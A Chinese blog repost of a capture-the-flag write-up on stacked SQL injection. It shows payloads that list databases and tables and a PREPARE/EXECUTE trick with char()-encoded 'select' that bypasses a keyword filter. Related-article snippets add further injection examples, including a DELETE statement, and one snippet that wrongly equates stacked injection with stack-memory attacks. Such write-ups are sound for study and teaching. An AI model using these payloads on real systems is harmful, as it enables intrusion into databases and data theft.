堆叠注入

最新推荐文章于 2023-12-28 16:03:25 发布
最新推荐文章于 2023-12-28 16:03:25 发布
阅读量224 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/Timesi/p/11426348.html
版权

什么是堆叠注入?

顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。

题目

1417438-20190828203149700-509602448.jpg

首先尝试闭合引号,并注释后面的内容。
1417438-20190828203158119-1882144614.jpg
发现没有报错,那就判断一下有多少列。

1417438-20190828203205155-712309812.jpg
1417438-20190828203208469-876192790.jpg
由此可以判断出有两列,接着判断回显位。

1417438-20190828203212932-610868824.jpg

发现回显了过滤规则,select是被过滤的,还有一些注入常用语句也被过滤了。

这时就可以尝试一下堆叠注入。
1417438-20190828203216627-2064840038.jpg
发现这里爆出了所有数据库,再来看看数据表。
1417438-20190828203247445-874600076.jpg
发现有两个数据表,通过查看表结构看一下哪个表里面有flag字段。
1417438-20190828203252308-1915690827.jpg
1417438-20190828203257420-1125158053.jpg

发现flag字段在1919810931114514表中,接着想办法去读取这个表中的flag字段的值(因为一些常用语句都被过滤了,不能直接查询)。
这里实在不知道怎么办了,于是百度发现大佬的wp用预处理语句绕过了过滤。

预处理语句使用方式:

SET @sql = variable;  //设置变量
PREPARE yuchuli from '[my sql sequece]';   //预定义SQL语句
EXECUTE yuchuli;  //执行预定义SQL语句sqla

这里是将我们要处理的语句先与定义为yuchuli,再进行执行,绕过关键字的过滤,于是就有了如下的语句。

PREPARE yuchuli from 'select * from `1919810931114514`';
EXECUTE yuchuli;

但是这里的select是被过滤的,于是想到可以对他进行编码绕过.

SET @sql = concat(char(115,101,108,101,99,116), " * from `1919810931114514`");
PREPARE yuchuli from @sql;
EXECUTE yuchuli;

1417438-20190828203309368-1493654539.jpg
成功拿到了flag。

转载于:https://www.cnblogs.com/Timesi/p/11426348.html

weixin_30752377
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-其他注入和二次注入
07-15
然后,他们使用堆叠注入执行不同的查询,例如获取数据库名、数据表、字段以及读取数据: - 获取数据库名:`?id=1' AND 1=2 UNION SELECT 1, DATABASE(), 3--` - 获取数据表:`?id=1' AND 1=2 UNION SELECT 1, ...
第18天:WEB漏洞-SQL注入堆叠及WAF绕过注入1
08-03
堆叠注入(Stacked Injections)是 SQL 注入的一种特殊形式,即在一个 SQL 语句中执行多个语句。 在 MySQL 中,每个语句结尾加;表示语句结束。因此,我们可以将多个语句结合起来,形成一个堆叠注入。例如: id=-1...
sql注入堆叠注入
weixin_42566218的博客
02-19 8568
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
SQL注入堆叠注入
qq_45691294的博客
07-16 1万+
堆叠注入原理 堆叠注入,顾名思义,就是将语句堆叠在一起进行查询 原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如 select * from users;show databases; 就同时执行以上两条命令,所以我们可以增删改查,只要权限够 虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函
Stacked Queries(堆叠注入
qq_45521281的博客
03-28 3539
文章目录基本知识原理介绍:堆叠注入的局限性Mysql数据库实例介绍CTF 实战与各种姿势修改表名利用HANDLER语句利用MySql预处理正常利用MySql预处理配合十六进制绕过关键字MySql预处理配合字符串拼接绕过关键字 Stacked injection 汉语翻译过来后,国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询( ; ),可以达到 修改数据 和 调用存储过程 的目的。这种技术在SQL注入中还是比较
【sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4583
堆叠注入】相比其他注入能执行的操作更多
堆叠注入原理解析
qq_45927819的博客
03-19 7731
文章目录一、堆叠注入原理二、堆叠注入触发条件三、题目 一、堆叠注入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠注入 二、堆叠注入触发条件 堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
Pgsql堆叠注入场景下通过`CREATE FUNCTION`来实现命令执行 .pdf
09-05
【Pgsql堆叠注入与`CREATE FUNCTION`命令执行】 在网络安全领域,PostgreSQL数据库的安全性是不容忽视的一环。本文探讨了一种特定的攻击手法,即在Pgsql堆叠注入的场景下,利用`CREATE FUNCTION`关键字来实现命令...
mysql注入-sqlilabs靶场注入
10-15
首先,我们要了解SQL注入的基本类型:错误注入、盲注、时间盲注和堆叠查询注入。错误注入是通过触发服务器错误来获取信息,而盲注则是在不显示查询结果的情况下判断条件是否为真。时间盲注利用了数据库处理查询的...
堆叠注入([强网杯 2019]随便注1)
热门推荐
Battery的博客
10-13 8万+
堆叠注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。堆叠注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1433
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
堆叠注入(stacked injecti)
最新发布
m0_73248913的博客
12-28 492
表示一条sql语句的结束,在后面再次执行下一条sql语句。(union只能苹姐一条select语句)其实可以发现就是简单的都能用,和做sql是一样的操作。概念:执行多条sql语句一起执行。
sql注入知识---堆叠注入
尘玥的故事
04-11 1209
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
web漏洞-SQL注入漏洞扩展(堆叠查询注入)-SQLi LABS 38关到41关讲解
ran的博客
01-19 671
比如在注入时,需要得到管理员的账号和密码,但是这个密码是加密的,且无法解密,此时便可以利用堆叠注入向管理员用户的表内进行插入用户数据,创建用户来登录迂回的注入数据库,但是前提是网站的管理员必须是高权限才能完全创建用户。因为是插入的数据,所以新插入的管理员用户的密码是自定义的,将用户数据插入之后,就可以实施登录了,此时便可以忽略密码无法解密的问题。区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。”(返回执行的SQL语句并换行)。
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3177
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
15-SQL堆叠注入
qq_56414082的博客
03-29 1642
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
sql-堆叠注入
zhhhb1005的博客
08-14 507
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
SQL注入-堆叠注入
m0_53820621的博客
08-15 1385
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
sqlmap 堆叠注入
08-17
堆叠注入是一种利用数据库查询语句的漏洞进行攻击的技术。SQLMap是一个常用的自动化SQL注入工具,它可以用来检测和利用堆叠注入漏洞。 堆叠注入是通过将多个SQL语句连接在一起执行,从而绕过输入过滤和参数绑定等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值